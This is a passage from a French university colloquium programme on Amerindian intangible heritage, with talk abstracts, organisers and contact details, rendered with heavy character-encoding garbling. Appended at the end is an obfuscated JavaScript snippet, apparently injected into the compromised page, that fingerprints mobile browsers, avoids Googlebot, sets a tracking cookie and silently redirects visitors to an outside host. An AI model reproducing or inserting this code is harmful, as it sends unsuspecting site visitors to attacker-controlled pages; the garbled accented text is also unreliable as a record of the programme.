La��acte de filmer sa��inscrit dans une longue dA�marche de revalorisation identitaire chez les Indiens Karaja. Or, tous les villages ne se sentent pas concernA�s par cette A�A�mise en scA?neA�A� de leurs pratiques culturelles. Que nous rA�vA?le cette attitude A� la��A�gard de la camA�ra (et autres procA�dA�s da��enregistrement) quant A� la mise en perspective de la A�A�cultureA�A�, et aux modifications induites par le traitement de cette derniA?re dans les relations intra et interethniques de ce peuple indigA?ne ? Une comparaison pourra A?tre amorcA�e avec les Yawalapiti du Xingu.

A� qui appartiennent les motifs des peintures corporelles wayana (Guyane)A�?

Pierre DA�lA�age (CNRS, LAS) et Mataliwa Kulijaman

Nous prA�senterons une nouvelle version da��un rA�cit traditionnel expliquant la��origine des motifs graphiques des peintures corporelles wayana. Cette version a A�tA� A�laborA�e A� partir de sources orales et de sources A�crites. Elle dA�crit, entre autres choses, comment des entitA�s surnaturelles, les Kujuli, ont inventA� ces motifs puis les ont transmis aux ancA?tres des Wayana. Dans un contexte oA? la question de la propriA�tA� intellectuelle de ce genre de traditions artistiques est souvent posA�e, on se demandera en quoi un tel rA�cit permet de compliquer et de reformuler les rA�ponses qui sont habituellement proposA�es.

Discussion

Pause

16h15

Les mots de la��immatA�rielA�: la��A�criture des a�?traditions intangiblesa�� (Amazonie, Guyane et BrA�sil)

Silvia Macedo (EREA/LESC)

Dans cette intervention nous aborderons le rapport entre la��acte da��A�crire et les procA�dures de patrimonialisation des biens intangibles chez les populations amA�rindiennes du bassin amazonien. La��A�criture est A� la fois une A�tape et un instrument fondamental des candidatures et des politiques de sauvegarde promues par des institutions comme la��UNESCO et la��institut du patrimoine au BrA�sil (IPHAN). A partir de la��analyse des candidatures et des politiques de sauvegarde des biens intangibles chez des peuples amA�rindiens du bassin amazonien, nous nous pencherons sur les types de production A�crite et sur leur rapport aux formes autochtones de transmission et de mA�morisation.

Traces et rA�vA�lationsA�: les manuscrits chamaniques en langue quechua (Amazonie pA�ruvienne)

Andrea-Luz Gutierrez Choquevilca (EPHE, LAS)

La��exposA� prA�sentera les premiers jalons da��une recherche sur la circulation da��inscriptions secrA?tes de chants chamaniques au sein da��un rA�seau multiethnique en Amazonie pA�ruvienne. Dans quel contexte socio-historique un savoir A�sotA�rique jadis consignA� A� la��oralitA� a t-il A�tA� progressivement associA� A� de nouvelles formes de transmissionA�? Quel usage rituel A�choit A� ces A�critsA�? En articulant da��une maniA?re inA�dite la��oralitA� A� la��A�criture, ces innovations interrogent la spA�cificitA� des mA�canismes de traduction mobilisA�s par la mA�moire rituelle et la transformation contemporaine des rA�gimes de savoir amA�rindiens.

Discussion

Discussion finale

A�

ComitA� da��OrganisationA�:

Anath Ariel de Vidas, Marie Chosson, Valentina Vapnarsky

Chiara Bortolotto, Isabelle Daillant, GA�rard Collomb

 

Le programme dA�taillA� en pdf

 

Contact et renseignementsA�

Marie ChossonA�: mchosson5@hotmail.com

Laboratoire da��Ethnologie et de Sociologie ComparativeA�– Salle 308

Maison Ethnologie et ArchA�ologie RenA�-GinouvA?s

21, allA�e de la��UniversitA�

UniversitA� de Nanterre

accA?sA�:A�http://www.mae.u-paris10.fr/infos-pratiques/

A�

 

 var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}